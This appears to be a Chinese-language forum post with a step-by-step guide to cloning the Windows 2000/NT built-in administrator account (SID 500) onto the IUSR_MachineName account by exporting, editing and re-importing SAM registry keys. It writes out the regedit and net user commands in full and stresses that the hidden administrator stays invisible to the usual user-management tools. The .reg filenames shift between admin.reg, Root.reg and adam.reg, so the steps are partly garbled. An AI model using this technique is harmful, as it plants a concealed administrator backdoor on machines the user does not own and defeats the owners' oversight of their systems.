详述一下:
    Windows 2000和Windows NT里，默认管理员帐号的SID是固定的500（0x1f4），那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆，在这里我们选择的帐号是IUSR_MachineName (为了加强隐蔽性)。

    cmd 下regedit /e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4，将SID为500的管理员帐号的相关信息导出，然后编辑admin.reg文件，将admin.reg文件的第三行[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]。

    最后的'1F4'修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9，如果机器在最初安装的时候没有安装IIS，而自己创建了帐号后再安装IIS就有可能不是这个值)，将Root.reg文件中的'1F4'修改为'3E9'后执行然后另外一个是你需要修改那个账号的值regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9
将iusr.reg文件中“'V'=hex:0”开始一直到iusr.reg文件结束部分复制下来,然后替换掉adam.reg中同样位置的部分.最后使用   regedit /s adam.reg 导入该Reg文件,然后运行 net user IUSR_MachineName password 修改IUSR_MachineName的密码.

    hehe,ok，大功告成！
    现在IUSR_MachineName账号拥有了管理员的权限，但是你使用net.exe和管理工具中的用户管理都将看不到任何痕迹，即使你去察看所属于的组和用户，都和修改前没有任何区别。

    大概就知道这么多了，各位如果有更好的方法不吝赐教。